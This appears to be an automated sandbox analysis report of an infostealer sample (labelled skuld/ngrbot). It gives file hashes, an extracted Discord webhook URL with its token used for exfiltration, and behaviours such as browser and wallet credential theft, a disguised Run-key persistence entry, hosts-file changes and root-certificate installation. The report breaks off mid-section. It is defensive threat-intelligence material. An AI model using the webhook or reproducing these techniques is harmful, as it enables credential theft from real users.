Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09-09-2024 05:28
Behavioral task
behavioral1
Sample
2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe
-
Size
9.9MB
-
MD5
23781fcb940954c24ba00db16dbe7457
-
SHA1
e565b0c2b956d023ee1da679f9d98d9966905f59
-
SHA256
62a7ed6c03d5e519cc5121fe8ad967bdadbbda106a3250b03ab50fb10457ed37
-
SHA512
6dce37bd3d8c2b84d74cc83950746430bab67d58327b499a2a63916ce1c352d6e7b01a6d68cde47bd8b950f95987a1fcaffb828af766eb460c2bb099b84c5af4
-
SSDEEP
98304:sQI9wzKxmhMIIKfGTibiyCC9cK8DE2ICafZmwjsEejd:sIzKxmhhtbiyCicRQDUjd
Malware Config
Extracted
skuld
https://discord.com/api/webhooks/1280306887027462206/GtUqNpq7R1lJgLWltd9zkaZFSnTqXfzqc2ZtsM3ihssU59gKWVrX9-G8wZ0UelMztpfV
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Processes:
powershell.exepowershell.exepid process 4948 powershell.exe 2012 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exe2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 api.ipify.org 4 api.ipify.org 5 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 6 Go-http-client/1.1 -
Processes:
2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exepowershell.exepowershell.exepid process 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 2012 powershell.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 2012 powershell.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 4948 powershell.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 4948 powershell.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe Token: SeIncreaseQuotaPrivilege 224 wmic.exe Token: SeSecurityPrivilege 224 wmic.exe Token: SeTakeOwnershipPrivilege 224 wmic.exe Token: SeLoadDriverPrivilege 224 wmic.exe Token: SeSystemProfilePrivilege 224 wmic.exe Token: SeSystemtimePrivilege 224 wmic.exe Token: SeProfSingleProcessPrivilege 224 wmic.exe Token: SeIncBasePriorityPrivilege 224 wmic.exe Token: SeCreatePagefilePrivilege 224 wmic.exe Token: SeBackupPrivilege 224 wmic.exe Token: SeRestorePrivilege 224 wmic.exe Token: SeShutdownPrivilege 224 wmic.exe Token: SeDebugPrivilege 224 wmic.exe Token: SeSystemEnvironmentPrivilege 224 wmic.exe Token: SeRemoteShutdownPrivilege 224 wmic.exe Token: SeUndockPrivilege 224 wmic.exe Token: SeManageVolumePrivilege 224 wmic.exe Token: 33 224 wmic.exe Token: 34 224 wmic.exe Token: 35 224 wmic.exe Token: 36 224 wmic.exe Token: SeIncreaseQuotaPrivilege 224 wmic.exe Token: SeSecurityPrivilege 224 wmic.exe Token: SeTakeOwnershipPrivilege 224 wmic.exe Token: SeLoadDriverPrivilege 224 wmic.exe Token: SeSystemProfilePrivilege 224 wmic.exe Token: SeSystemtimePrivilege 224 wmic.exe Token: SeProfSingleProcessPrivilege 224 wmic.exe Token: SeIncBasePriorityPrivilege 224 wmic.exe Token: SeCreatePagefilePrivilege 224 wmic.exe Token: SeBackupPrivilege 224 wmic.exe Token: SeRestorePrivilege 224 wmic.exe Token: SeShutdownPrivilege 224 wmic.exe Token: SeDebugPrivilege 224 wmic.exe Token: SeSystemEnvironmentPrivilege 224 wmic.exe Token: SeRemoteShutdownPrivilege 224 wmic.exe Token: SeUndockPrivilege 224 wmic.exe Token: SeManageVolumePrivilege 224 wmic.exe Token: 33 224 wmic.exe Token: 34 224 wmic.exe Token: 35 224 wmic.exe Token: 36 224 wmic.exe Token: SeIncreaseQuotaPrivilege 216 wmic.exe Token: SeSecurityPrivilege 216 wmic.exe Token: SeTakeOwnershipPrivilege 216 wmic.exe Token: SeLoadDriverPrivilege 216 wmic.exe Token: SeSystemProfilePrivilege 216 wmic.exe Token: SeSystemtimePrivilege 216 wmic.exe Token: SeProfSingleProcessPrivilege 216 wmic.exe Token: SeIncBasePriorityPrivilege 216 wmic.exe Token: SeCreatePagefilePrivilege 216 wmic.exe Token: SeBackupPrivilege 216 wmic.exe Token: SeRestorePrivilege 216 wmic.exe Token: SeShutdownPrivilege 216 wmic.exe Token: SeDebugPrivilege 216 wmic.exe Token: SeSystemEnvironmentPrivilege 216 wmic.exe Token: SeRemoteShutdownPrivilege 216 wmic.exe Token: SeUndockPrivilege 216 wmic.exe Token: SeManageVolumePrivilege 216 wmic.exe Token: 33 216 wmic.exe Token: 34 216 wmic.exe Token: 35 216 wmic.exe Token: 36 216 wmic.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
